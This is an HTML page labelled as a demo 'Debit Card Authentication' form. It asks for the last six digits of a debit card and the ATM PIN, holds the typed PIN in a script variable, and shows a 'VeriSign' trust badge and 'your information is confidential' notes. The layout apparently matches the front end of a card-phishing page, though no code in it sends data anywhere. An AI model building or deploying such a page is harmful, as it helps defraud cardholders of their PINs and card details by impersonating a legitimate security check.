<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Debit Card Authentication – Demo</title>

<style>
*{
  box-sizing:border-box;
  margin:0;
  padding:0;
  font-family:Arial, Helvetica, sans-serif;
}

body{
  background:#f8f8f8;
  display:flex;
  justify-content:center;
  padding:20px 0;
}

.page{
  max-width:380px;
  width:100%;
  background:#fff;
  border-radius:12px;
  overflow:hidden;
  box-shadow:0 2px 12px rgba(0,0,0,0.1);
  display:flex;
  flex-direction:column;
}

/* HEADER */
.header{
  padding:14px 16px;
  font-size:18px;
  font-weight:bold;
  text-align:center;
  border-bottom:1px solid #ddd;
}

/* CARD IMAGE ROTATION */
.card-img{
  width:100%;
  aspect-ratio: 1.585; /* Width / Height ratio of card */
  max-height:250px;
  border-radius:12px 12px 0 0;
  margin-bottom:12px;
  overflow:hidden;
}

.card-img img{
  width:100%;
  height:100%;
  object-fit:contain; /* fully visible, no cut */
}

/* FORM */
.form{
  padding:16px;
}

.form label{
  font-weight:bold;
  display:block;
  margin-top:14px;
  margin-bottom:6px;
  font-size:15px;
}

.card-input{
  display:flex;
  align-items:center;
  border:1px solid #cfcfcf;
  border-radius:12px;
  height:50px;
  padding:0 12px;
  background:#fff;
}

.card-input .fixed{
  font-size:16px;
  color:#777;
  letter-spacing:2px;
  margin-right:6px;
  white-space:nowrap;
}

.card-input input{
  border:none;
  outline:none;
  font-size:16px;
  flex:1;
  letter-spacing:2px;
}

/* ATM PIN BIG DOTS */
#pin{
  width:100%;
  height:50px;
  border:1px solid #cfcfcf;
  border-radius:12px;
  padding:0 12px;
  font-size:42px;
  letter-spacing:22px;
  text-align:center;
  caret-color:transparent;
}

/* BUTTON */
button{
  width:100%;
  height:50px;
  margin-top:20px;
  background:#e6a100;
  border:none;
  border-radius:6px;
  font-size:17px;
  color:#fff;
  font-weight:bold;
  cursor:pointer;
}

/* NOTE BOX */
.note-box{
  margin:16px;
  background:#e9f4ff;
  padding:12px;
  font-size:13px;
}

.note-box ul{
  padding-left:16px;
}

.note-box li{
  margin-bottom:4px;
}

/* FOOTER */
.footer{
  margin-top:auto;
  margin-bottom:20px;
  background:#000;
  color:#fff;
  padding:10px 12px;
  font-size:13px;
  display:flex;
  align-items:center;
  gap:2px;
}

.footer .tick{
  font-size:14px;
}
</style>
</head>
<body>

<div class="page">

  <div class="header">Debit Card Authentication</div>

  <!-- CARD IMAGE ROTATION -->
  <div class="card-img">
    <img id="cardImage" src="img/card1.jpg" alt="Card">
  </div>

  <div class="form">

    <!-- Card Number -->
    <label>Enter last 6 digits of card</label>
    <div class="card-input">
      <span class="fixed">#### #### ##</span>
      <input type="text" id="cardLast6" maxlength="7" placeholder="__ ____" inputmode="numeric">
    </div>

    <!-- ATM PIN -->
    <label>Enter ATM PIN</label>
    <input type="tel" id="pin" inputmode="numeric" placeholder="••••">

    <!-- Proceed -->
    <button>Proceed →</button>

  </div>

  <!-- NOTE BOX -->
  <div class="note-box">
    <ul>
      <li>Mandatory fields are marked as important</li>
      <li>Do not share personal information</li>
      <li>Your information is confidential</li>
    </ul>
  </div>

  <!-- FOOTER -->
  <div class="footer">
    <span class="tick">✔</span>
    <span>VeriSign &nbsp; © Copyright | All Rights Reserved</span>
  </div>

</div>

<script>
// ==== CARD IMAGE ROTATION ====
const cards = [
  "img/card1.jpg","img/card2.jpg","img/card3.jpg"
];
let index = 0;
setInterval(()=>{
  index = (index + 1) % cards.length;
  document.getElementById("cardImage").src = cards[index];
}, 2500);

// ==== LAST 6 DIGITS FORMATTING ====
const input = document.getElementById("cardLast6");
input.addEventListener("input", () => {
  let v = input.value.replace(/\D/g,''); // numbers only
  if(v.length>2) v = v.slice(0,2)+' '+v.slice(2,6);
  input.value = v;
});

// ==== ATM PIN BIG DOT LOGIC ====
const pin = document.getElementById("pin");
let fakePin = "";

pin.addEventListener("input", e => {
  if (e.inputType === "deleteContentBackward") {
    fakePin = fakePin.slice(0,-1);
  } 
  else if(/\d/.test(e.data) && fakePin.length<4){
    fakePin += e.data;
  }
  pin.value = "•".repeat(fakePin.length);
});
</script>

</body>
</html>